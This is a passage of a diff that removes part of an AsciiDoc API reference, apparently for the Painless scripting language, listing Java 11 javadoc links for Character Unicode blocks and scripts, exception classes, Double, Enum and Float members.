{java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#TAGS[TAGS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#TAI_LE[TAI_LE] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#TAI_THAM[TAI_THAM] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#TAI_VIET[TAI_VIET] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#TAI_XUAN_JING_SYMBOLS[TAI_XUAN_JING_SYMBOLS] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#TAKRI[TAKRI] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#TAMIL[TAMIL] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#TELUGU[TELUGU] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#THAANA[THAANA] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#THAI[THAI] -* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#TIBETAN[TIBETAN] -* static Character.UnicodeBlock 
{java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#TIFINAGH[TIFINAGH]
-* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#TRANSPORT_AND_MAP_SYMBOLS[TRANSPORT_AND_MAP_SYMBOLS]
-* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#UGARITIC[UGARITIC]
-* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#UNIFIED_CANADIAN_ABORIGINAL_SYLLABICS[UNIFIED_CANADIAN_ABORIGINAL_SYLLABICS]
-* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#UNIFIED_CANADIAN_ABORIGINAL_SYLLABICS_EXTENDED[UNIFIED_CANADIAN_ABORIGINAL_SYLLABICS_EXTENDED]
-* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#VAI[VAI]
-* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#VARIATION_SELECTORS[VARIATION_SELECTORS]
-* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#VARIATION_SELECTORS_SUPPLEMENT[VARIATION_SELECTORS_SUPPLEMENT]
-* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#VEDIC_EXTENSIONS[VEDIC_EXTENSIONS]
-* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#VERTICAL_FORMS[VERTICAL_FORMS]
-* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#YIJING_HEXAGRAM_SYMBOLS[YIJING_HEXAGRAM_SYMBOLS]
-* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#YI_RADICALS[YI_RADICALS]
-* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#YI_SYLLABLES[YI_SYLLABLES]
-* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#forName(java.lang.String)[forName](null)
-* static Character.UnicodeBlock {java11-javadoc}/java.base/java/lang/Character$UnicodeBlock.html#of(int)[of](int)
-* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object)
-* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]()
-* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]()
-
-
-[[painless-api-reference-shared-Character-UnicodeScript]]
-==== Character.UnicodeScript
-* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#ARABIC[ARABIC]
-* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#ARMENIAN[ARMENIAN]
-* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#AVESTAN[AVESTAN]
-* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#BALINESE[BALINESE]
-* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#BAMUM[BAMUM]
-* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#BATAK[BATAK]
-* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#BENGALI[BENGALI]
-* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#BOPOMOFO[BOPOMOFO]
-* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#BRAHMI[BRAHMI]
-* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#BRAILLE[BRAILLE]
-* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#BUGINESE[BUGINESE] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#BUHID[BUHID] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#CANADIAN_ABORIGINAL[CANADIAN_ABORIGINAL] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#CARIAN[CARIAN] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#CHAKMA[CHAKMA] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#CHAM[CHAM] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#CHEROKEE[CHEROKEE] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#COMMON[COMMON] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#COPTIC[COPTIC] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#CUNEIFORM[CUNEIFORM] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#CYPRIOT[CYPRIOT] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#CYRILLIC[CYRILLIC] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#DESERET[DESERET] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#DEVANAGARI[DEVANAGARI] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#EGYPTIAN_HIEROGLYPHS[EGYPTIAN_HIEROGLYPHS] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#ETHIOPIC[ETHIOPIC] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#GEORGIAN[GEORGIAN] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#GLAGOLITIC[GLAGOLITIC] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#GOTHIC[GOTHIC] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#GREEK[GREEK] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#GUJARATI[GUJARATI] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#GURMUKHI[GURMUKHI] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#HAN[HAN] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#HANGUL[HANGUL] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#HANUNOO[HANUNOO] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#HEBREW[HEBREW] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#HIRAGANA[HIRAGANA] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#IMPERIAL_ARAMAIC[IMPERIAL_ARAMAIC] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#INHERITED[INHERITED] -* static Character.UnicodeScript 
{java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#INSCRIPTIONAL_PAHLAVI[INSCRIPTIONAL_PAHLAVI] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#INSCRIPTIONAL_PARTHIAN[INSCRIPTIONAL_PARTHIAN] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#JAVANESE[JAVANESE] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#KAITHI[KAITHI] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#KANNADA[KANNADA] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#KATAKANA[KATAKANA] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#KAYAH_LI[KAYAH_LI] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#KHAROSHTHI[KHAROSHTHI] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#KHMER[KHMER] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#LAO[LAO] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#LATIN[LATIN] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#LEPCHA[LEPCHA] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#LIMBU[LIMBU] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#LINEAR_B[LINEAR_B] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#LISU[LISU] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#LYCIAN[LYCIAN] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#LYDIAN[LYDIAN] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#MALAYALAM[MALAYALAM] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#MANDAIC[MANDAIC] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#MEETEI_MAYEK[MEETEI_MAYEK] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#MEROITIC_CURSIVE[MEROITIC_CURSIVE] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#MEROITIC_HIEROGLYPHS[MEROITIC_HIEROGLYPHS] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#MIAO[MIAO] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#MONGOLIAN[MONGOLIAN] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#MYANMAR[MYANMAR] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#NEW_TAI_LUE[NEW_TAI_LUE] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#NKO[NKO] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#OGHAM[OGHAM] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#OLD_ITALIC[OLD_ITALIC] -* static Character.UnicodeScript 
{java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#OLD_PERSIAN[OLD_PERSIAN] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#OLD_SOUTH_ARABIAN[OLD_SOUTH_ARABIAN] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#OLD_TURKIC[OLD_TURKIC] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#OL_CHIKI[OL_CHIKI] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#ORIYA[ORIYA] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#OSMANYA[OSMANYA] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#PHAGS_PA[PHAGS_PA] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#PHOENICIAN[PHOENICIAN] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#REJANG[REJANG] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#RUNIC[RUNIC] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#SAMARITAN[SAMARITAN] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#SAURASHTRA[SAURASHTRA] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#SHARADA[SHARADA] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#SHAVIAN[SHAVIAN] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#SINHALA[SINHALA] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#SORA_SOMPENG[SORA_SOMPENG] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#SUNDANESE[SUNDANESE] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#SYLOTI_NAGRI[SYLOTI_NAGRI] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#SYRIAC[SYRIAC] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#TAGALOG[TAGALOG] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#TAGBANWA[TAGBANWA] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#TAI_LE[TAI_LE] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#TAI_THAM[TAI_THAM] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#TAI_VIET[TAI_VIET] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#TAKRI[TAKRI] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#TAMIL[TAMIL] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#TELUGU[TELUGU] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#THAANA[THAANA] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#THAI[THAI] -* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#TIBETAN[TIBETAN] -* static 
Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#TIFINAGH[TIFINAGH]
-* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#UGARITIC[UGARITIC]
-* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#UNKNOWN[UNKNOWN]
-* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#VAI[VAI]
-* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#YI[YI]
-* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#forName(java.lang.String)[forName](null)
-* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#of(int)[of](int)
-* static Character.UnicodeScript {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#valueOf(java.lang.String)[valueOf](null)
-* static Character.UnicodeScript[] {java11-javadoc}/java.base/java/lang/Character$UnicodeScript.html#values()[values]()
-* int {java11-javadoc}/java.base/java/lang/Enum.html#compareTo(java.lang.Enum)[compareTo](Enum)
-* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object)
-* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]()
-* null {java11-javadoc}/java.base/java/lang/Enum.html#name()[name]()
-* int {java11-javadoc}/java.base/java/lang/Enum.html#ordinal()[ordinal]()
-* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]()
-
-
-[[painless-api-reference-shared-ClassCastException]]
-==== ClassCastException
-* {java11-javadoc}/java.base/java/lang/ClassCastException.html#<init>()[ClassCastException]()
-* {java11-javadoc}/java.base/java/lang/ClassCastException.html#<init>(java.lang.String)[ClassCastException](null)
-* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object)
-* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]()
-* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]()
-* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]()
-* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]()
-* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]()
-
-
-[[painless-api-reference-shared-ClassNotFoundException]]
-==== ClassNotFoundException
-* {java11-javadoc}/java.base/java/lang/ClassNotFoundException.html#<init>()[ClassNotFoundException]()
-* {java11-javadoc}/java.base/java/lang/ClassNotFoundException.html#<init>(java.lang.String)[ClassNotFoundException](null)
-* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object)
-* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]()
-* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]()
-* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]()
-* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]()
-* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]()
-
-
-[[painless-api-reference-shared-CloneNotSupportedException]]
-==== CloneNotSupportedException
-* {java11-javadoc}/java.base/java/lang/CloneNotSupportedException.html#<init>()[CloneNotSupportedException]()
-* {java11-javadoc}/java.base/java/lang/CloneNotSupportedException.html#<init>(java.lang.String)[CloneNotSupportedException](null)
-* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object)
-* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]()
-* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]()
-* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]()
-* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]()
-* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]()
-
-
-[[painless-api-reference-shared-Comparable]]
-==== Comparable
-* int {java11-javadoc}/java.base/java/lang/Comparable.html#compareTo(java.lang.Object)[compareTo](def)
-* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object)
-* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]()
-* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]()
-
-
-[[painless-api-reference-shared-Double]]
-==== Double
-* static int {java11-javadoc}/java.base/java/lang/Double.html#BYTES[BYTES]
-* static int {java11-javadoc}/java.base/java/lang/Double.html#MAX_EXPONENT[MAX_EXPONENT]
-* static double {java11-javadoc}/java.base/java/lang/Double.html#MAX_VALUE[MAX_VALUE]
-* static int {java11-javadoc}/java.base/java/lang/Double.html#MIN_EXPONENT[MIN_EXPONENT]
-* static double {java11-javadoc}/java.base/java/lang/Double.html#MIN_NORMAL[MIN_NORMAL]
-* static double {java11-javadoc}/java.base/java/lang/Double.html#MIN_VALUE[MIN_VALUE]
-* static double {java11-javadoc}/java.base/java/lang/Double.html#NEGATIVE_INFINITY[NEGATIVE_INFINITY]
-* static double {java11-javadoc}/java.base/java/lang/Double.html#NaN[NaN]
-* static double {java11-javadoc}/java.base/java/lang/Double.html#POSITIVE_INFINITY[POSITIVE_INFINITY]
-* static int {java11-javadoc}/java.base/java/lang/Double.html#SIZE[SIZE]
-* static int {java11-javadoc}/java.base/java/lang/Double.html#compare(double,double)[compare](double, double)
-* static long {java11-javadoc}/java.base/java/lang/Double.html#doubleToLongBits(double)[doubleToLongBits](double)
-* static long {java11-javadoc}/java.base/java/lang/Double.html#doubleToRawLongBits(double)[doubleToRawLongBits](double)
-* static int {java11-javadoc}/java.base/java/lang/Double.html#hashCode(double)[hashCode](double)
-* static boolean {java11-javadoc}/java.base/java/lang/Double.html#isFinite(double)[isFinite](double)
-* static boolean {java11-javadoc}/java.base/java/lang/Double.html#isInfinite(double)[isInfinite](double)
-* static boolean {java11-javadoc}/java.base/java/lang/Double.html#isNaN(double)[isNaN](double)
-* static double {java11-javadoc}/java.base/java/lang/Double.html#longBitsToDouble(long)[longBitsToDouble](long)
-* static double {java11-javadoc}/java.base/java/lang/Double.html#max(double,double)[max](double, double)
-* static double {java11-javadoc}/java.base/java/lang/Double.html#min(double,double)[min](double, double)
-* static double {java11-javadoc}/java.base/java/lang/Double.html#parseDouble(java.lang.String)[parseDouble](null)
-* static double {java11-javadoc}/java.base/java/lang/Double.html#sum(double,double)[sum](double, double)
-* static null {java11-javadoc}/java.base/java/lang/Double.html#toHexString(double)[toHexString](double)
-* static null {java11-javadoc}/java.base/java/lang/Double.html#toString(double)[toString](double)
-* static Double {java11-javadoc}/java.base/java/lang/Double.html#valueOf(double)[valueOf](double)
-* byte {java11-javadoc}/java.base/java/lang/Number.html#byteValue()[byteValue]()
-* int {java11-javadoc}/java.base/java/lang/Double.html#compareTo(java.lang.Double)[compareTo](Double)
-* double {java11-javadoc}/java.base/java/lang/Number.html#doubleValue()[doubleValue]()
-* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object)
-* float {java11-javadoc}/java.base/java/lang/Number.html#floatValue()[floatValue]()
-* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]()
-* int {java11-javadoc}/java.base/java/lang/Number.html#intValue()[intValue]()
-* boolean {java11-javadoc}/java.base/java/lang/Double.html#isInfinite()[isInfinite]()
-* boolean {java11-javadoc}/java.base/java/lang/Double.html#isNaN()[isNaN]()
-* long {java11-javadoc}/java.base/java/lang/Number.html#longValue()[longValue]()
-* short {java11-javadoc}/java.base/java/lang/Number.html#shortValue()[shortValue]()
-* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]()
-
-
-[[painless-api-reference-shared-Enum]]
-==== Enum
-* int {java11-javadoc}/java.base/java/lang/Enum.html#compareTo(java.lang.Enum)[compareTo](Enum)
-* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object)
-* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]()
-* null {java11-javadoc}/java.base/java/lang/Enum.html#name()[name]()
-* int {java11-javadoc}/java.base/java/lang/Enum.html#ordinal()[ordinal]()
-* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]()
-
-
-[[painless-api-reference-shared-EnumConstantNotPresentException]]
-==== EnumConstantNotPresentException
-* null {java11-javadoc}/java.base/java/lang/EnumConstantNotPresentException.html#constantName()[constantName]()
-* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object)
-* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]()
-* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]()
-* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]()
-* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]()
-* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]()
-
-
-[[painless-api-reference-shared-Exception]]
-==== Exception
-* {java11-javadoc}/java.base/java/lang/Exception.html#<init>()[Exception]()
-* {java11-javadoc}/java.base/java/lang/Exception.html#<init>(java.lang.String)[Exception](null)
-* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object)
-* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]()
-* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]()
-* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]()
-* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]()
-* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]()
-
-
-[[painless-api-reference-shared-Float]]
-==== Float
-* static int {java11-javadoc}/java.base/java/lang/Float.html#BYTES[BYTES]
-* static int {java11-javadoc}/java.base/java/lang/Float.html#MAX_EXPONENT[MAX_EXPONENT]
-* static float {java11-javadoc}/java.base/java/lang/Float.html#MAX_VALUE[MAX_VALUE] -* 
static int {java11-javadoc}/java.base/java/lang/Float.html#MIN_EXPONENT[MIN_EXPONENT] -* static float {java11-javadoc}/java.base/java/lang/Float.html#MIN_NORMAL[MIN_NORMAL] -* static float {java11-javadoc}/java.base/java/lang/Float.html#MIN_VALUE[MIN_VALUE] -* static float {java11-javadoc}/java.base/java/lang/Float.html#NEGATIVE_INFINITY[NEGATIVE_INFINITY] -* static float {java11-javadoc}/java.base/java/lang/Float.html#NaN[NaN] -* static float {java11-javadoc}/java.base/java/lang/Float.html#POSITIVE_INFINITY[POSITIVE_INFINITY] -* static int {java11-javadoc}/java.base/java/lang/Float.html#SIZE[SIZE] -* static int {java11-javadoc}/java.base/java/lang/Float.html#compare(float,float)[compare](float, float) -* static int {java11-javadoc}/java.base/java/lang/Float.html#floatToIntBits(float)[floatToIntBits](float) -* static int {java11-javadoc}/java.base/java/lang/Float.html#floatToRawIntBits(float)[floatToRawIntBits](float) -* static int {java11-javadoc}/java.base/java/lang/Float.html#hashCode(float)[hashCode](float) -* static float {java11-javadoc}/java.base/java/lang/Float.html#intBitsToFloat(int)[intBitsToFloat](int) -* static boolean {java11-javadoc}/java.base/java/lang/Float.html#isFinite(float)[isFinite](float) -* static boolean {java11-javadoc}/java.base/java/lang/Float.html#isInfinite(float)[isInfinite](float) -* static boolean {java11-javadoc}/java.base/java/lang/Float.html#isNaN(float)[isNaN](float) -* static float {java11-javadoc}/java.base/java/lang/Float.html#max(float,float)[max](float, float) -* static float {java11-javadoc}/java.base/java/lang/Float.html#min(float,float)[min](float, float) -* static float {java11-javadoc}/java.base/java/lang/Float.html#parseFloat(java.lang.String)[parseFloat](null) -* static float {java11-javadoc}/java.base/java/lang/Float.html#sum(float,float)[sum](float, float) -* static null {java11-javadoc}/java.base/java/lang/Float.html#toHexString(float)[toHexString](float) -* static null {java11-javadoc}/java.base/java/lang/Float.html#toString(float)[toString](float) -* static Float {java11-javadoc}/java.base/java/lang/Float.html#valueOf(float)[valueOf](float) -* byte {java11-javadoc}/java.base/java/lang/Number.html#byteValue()[byteValue]() -* int {java11-javadoc}/java.base/java/lang/Float.html#compareTo(java.lang.Float)[compareTo](Float) -* double {java11-javadoc}/java.base/java/lang/Number.html#doubleValue()[doubleValue]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* float {java11-javadoc}/java.base/java/lang/Number.html#floatValue()[floatValue]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/Number.html#intValue()[intValue]() -* boolean {java11-javadoc}/java.base/java/lang/Float.html#isInfinite()[isInfinite]() -* boolean {java11-javadoc}/java.base/java/lang/Float.html#isNaN()[isNaN]() -* long {java11-javadoc}/java.base/java/lang/Number.html#longValue()[longValue]() -* short {java11-javadoc}/java.base/java/lang/Number.html#shortValue()[shortValue]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-IllegalAccessException]] -==== IllegalAccessException -* {java11-javadoc}/java.base/java/lang/IllegalAccessException.html#()[IllegalAccessException]() -* {java11-javadoc}/java.base/java/lang/IllegalAccessException.html#(java.lang.String)[IllegalAccessException](null) -* boolean 
